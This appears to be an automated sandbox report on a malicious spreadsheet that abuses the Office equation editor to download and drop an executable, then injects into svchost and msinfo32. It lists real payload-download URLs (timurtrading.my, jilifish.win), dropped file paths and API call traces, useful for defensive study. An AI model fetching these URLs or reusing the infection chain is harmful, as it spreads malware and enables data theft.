66 4b 6a 2f 6e 63 38 31 62 52 4e 53 79 55 64 50 76 2f 38 4f 35 78 58 4c 69 51 54 48 61 76 31 58 52 4a 53 4c 38 45 6f 68 48 53 54 42 59 6c 41 72 78 36 45 37 48 79 6c 31 31 38 43 38 6e 70 31 30 55 38 61 32 67 32 32 53 39 6c 6b 5a 35 53 70 57 2b 30 41 65 4c 44 38 79 64 6f 6a 46 57 5a 62 38 44 53 47 6f 30 7a 76 7a 55 53 4e 50 33 44 74 43 5a 41 33 74 6d 68 45 32 6d 45 53 42 72 55 73 4e 7a 4e 56 59 55 67 52 4c 41 56 43 62 62 33 6e 61 2b 31 6f 37 49 57 46 37 51 74 79 69 34 74 4c 33 52 4d 61 4d 62 53 4a 4c 66 41 61 39 4d 48 72 55 54 55 4b 54 62 71 68 47 38 63 37 64 63 39 6a 53 70 63 57 62 37 50 55 37 67 5a 4b 43 59 69 47 69 36 37 4b 37 4f 47 43 55 30 6e 57 2b 56 75 44 31 62 35 38 58 72 54 37 75 74 2b 58 6a 6e 6b 45 61 75 48 50 56 32 70 50 4d 55 58 39 6f 47 49 72 2f 79 64 55 35 59 53 4d 72 44 32 2f 75 68 61 6f 52 56 4d 50 79 68 45 54 74 71 41 57 63 76 2f 39 48 59 74 46 4e 51 35 31 57 73 44 6a 66 6c 72 51 57 50 6a 31 73 45 67 35 48 63 55 76 6f 76 38 36 32 48 48 4e 52 68 67 6c 69 2b 4b 41 4d 74 3
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 21 Oct 2024 09:29:40 GMTContent-Type: text/htmlContent-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openrestydate: Mon, 21 Oct 2024 09:29:57 GMTcontent-type: text/htmltransfer-encoding: chunkedx-powered-by: PHP/7.2.30content-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openrestydate: Mon, 21 Oct 2024 09:29:59 GMTcontent-type: text/htmltransfer-encoding: chunkedx-powered-by: PHP/7.2.30content-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openrestydate: Mon, 21 Oct 2024 09:30:02 GMTcontent-type: text/htmltransfer-encoding: chunkedx-powered-by: PHP/7.2.30content-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openrestydate: Mon, 21 Oct 2024 09:30:04 GMTcontent-type: text/htmlcontent-length: 150x-powered-by: PHP/7.2.30connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000002.00000003.460927398.000000000068E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460927398.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.461489671.000000000064F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.461489671.00000000006B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://timurtrading.my/kontempt2.1.exe
Source: EQNEDT32.EXE, 00000002.00000002.461489671.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://timurtrading.my/kontempt2.1.exet
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: XAgFxCrXhYKjE.exe, 0000000A.00000002.670976713.0000000001D6C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jilifish.win
Source: XAgFxCrXhYKjE.exe, 0000000A.00000002.670976713.0000000001D6C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jilifish.win/to3j/
Source: msinfo32.exe, 00000008.00000002.672775855.0000000061ED1000.00000008.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drString found in binary or memory: http://www.sqlite.org/copyright.html.
Source: msinfo32.exe, 00000008.00000003.584885355.0000000006133000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: msinfo32.exe, 00000008.00000003.584885355.0000000006133000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msinfo32.exe, 00000008.00000003.584885355.0000000006133000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msinfo32.exe, 00000008.00000003.584885355.0000000006133000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msinfo32.exe, 00000008.00000003.584885355.0000000006133000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: msinfo32.exe, 00000008.00000003.584885355.0000000006133000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: msinfo32.exe, 00000008.00000003.584885355.0000000006133000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: EQNEDT32.EXE, 00000002.00000003.460927398.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.461489671.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.461489671.000000000064F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460927398.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://timurtrading.my/
Source: EQNEDT32.EXE, 00000002.00000002.461489671.000000000068E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460927398.000000000068E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460927398.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.461489671.00000000006B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://timurtrading.my/kontempt2.1.exe
Source: EQNEDT32.EXE, 00000002.00000002.461489671.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://timurtrading.my/kontempt2.1.exeppC:
Source: 7yj1259-.8.drString found in binary or memory: https://www.google.com/favicon.ico
Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
Source: unknownHTTPS traffic detected: 192.3.255.145:443 -> 192.168.2.22:49162 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,5_2_0046C5D0
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00459FFF
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,5_2_0046C5D0
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,5_2_00456354
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0047C08E

System Summary

barindex
Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exeJump to dropped file
Source: C:\Windows\SysWOW64\svchost.exeProcess Stats: CPU usage > 49%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0042C623 NtClose,6_2_0042C623
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AB07AC NtCreateMutant,LdrInitializeThunk,6_2_00AB07AC
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAF9F0 NtClose,LdrInitializeThunk,6_2_00AAF9F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_00AAFAE8
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_00AAFB68
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_00AAFDC0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AB00C4 NtCreateFile,6_2_00AB00C4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AB0060 NtQuerySection,6_2_00AB0060
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AB0078 NtResumeThread,6_2_00AB0078
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AB0048 NtProtectVirtualMemory,6_2_00AB0048
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AB01D4 NtSetValueKey,6_2_00AB01D4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AB010C NtOpenDirectoryObject,6_2_00AB010C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AB0C40 NtGetContextThread,6_2_00AB0C40
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AB10D0 NtOpenProcessToken,6_2_00AB10D0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AB1148 NtOpenThread,6_2_00AB1148
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAF8CC NtWaitForSingleObject,6_2_00AAF8CC
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAF938 NtWriteFile,6_2_00AAF938
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AB1930 NtSetContextThread,6_2_00AB1930
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAF900 NtReadFile,6_2_00AAF900
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFAB8 NtQueryValueKey,6_2_00AAFAB8
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFAD0 NtAllocateVirtualMemory,6_2_00AAFAD0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFA20 NtQueryInformationFile,6_2_00AAFA20
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFA50 NtEnumerateValueKey,6_2_00AAFA50
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFBB8 NtQueryInformationToken,6_2_00AAFBB8
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFBE8 NtQueryVirtualMemory,6_2_00AAFBE8
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFB50 NtCreateKey,6_2_00AAFB50
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFC90 NtUnmapViewOfSection,6_2_00AAFC90
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFC30 NtOpenProcess,6_2_00AAFC30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFC60 NtMapViewOfSection,6_2_00AAFC60
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFC48 NtSetInformationFile,6_2_00AAFC48
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFD8C NtDelayExecution,6_2_00AAFD8C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AB1D80 NtSuspendThread,6_2_00AB1D80
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFD5C NtEnumerateKey,6_2_00AAFD5C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFEA0 NtReadVirtualMemory,6_2_00AAFEA0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFED0 NtAdjustPrivilegesToken,6_2_00AAFED0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFE24 NtWriteVirtualMemory,6_2_00AAFE24
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFFB4 NtCreateSection,6_2_00AAFFB4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFFFC NtCreateProcessEx,6_2_00AAFFFC
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AAFF34 NtQueueApcThread,6_2_00AAFF34
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,5_2_00434D50
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,5_2_004461ED
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,5_2_004364AA
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004120385_2_00412038
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0047E1FA5_2_0047E1FA
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041A46B5_2_0041A46B
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041240C5_2_0041240C
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004465665_2_00446566
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004045E05_2_004045E0
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004128185_2_00412818
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0047CBF05_2_0047CBF0
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00412C385_2_00412C38
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00424F705_2_00424F70
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041AF0D5_2_0041AF0D
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004271615_2_00427161
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004212BE5_2_004212BE
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004433905_2_00443390
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004433915_2_00443391
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041D7505_2_0041D750
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004037E05_2_004037E0
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004278595_2_00427859
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040F8905_2_0040F890
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0042397B5_2_0042397B
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00409A405_2_00409A40
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00411B635_2_00411B63
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00423EBF5_2_00423EBF
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_035157D05_2_035157D0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004185E36_2_004185E3
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004168236_2_00416823
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004030906_2_00403090
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004100936_2_00410093
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040E1136_2_0040E113
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004011F06_2_004011F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004023906_2_00402390
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00402BAE6_2_00402BAE
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0042EC636_2_0042EC63
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040FE6A6_2_0040FE6A
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040FE736_2_0040FE73
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004026F06_2_004026F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00ABE0C66_2_00ABE0C6
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00ABE2E96_2_00ABE2E9
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B663BF6_2_00B663BF
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AE63DB6_2_00AE63DB
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AC23056_2_00AC2305
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B0A37B6_2_00B0A37B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B4443E6_2_00B4443E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B405E36_2_00B405E3
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00ADC5F06_2_00ADC5F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B065406_2_00B06540
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AC46806_2_00AC4680
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00ACE6C16_2_00ACE6C1
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B0A6346_2_00B0A634
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B626226_2_00B62622
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00ACC7BC6_2_00ACC7BC
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AE286D6_2_00AE286D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00ACC85C6_2_00ACC85C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AC29B26_2_00AC29B2
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B6098E6_2_00B6098E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B549F56_2_00B549F5
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AD69FE6_2_00AD69FE
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B0C9206_2_00B0C920
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B6CBA46_2_00B6CBA4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B46BCB6_2_00B46BCB
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B62C9C6_2_00B62C9C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B4AC5E6_2_00B4AC5E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AF0D3B6_2_00AF0D3B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00ACCD5B6_2_00ACCD5B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AF2E2F6_2_00AF2E2F
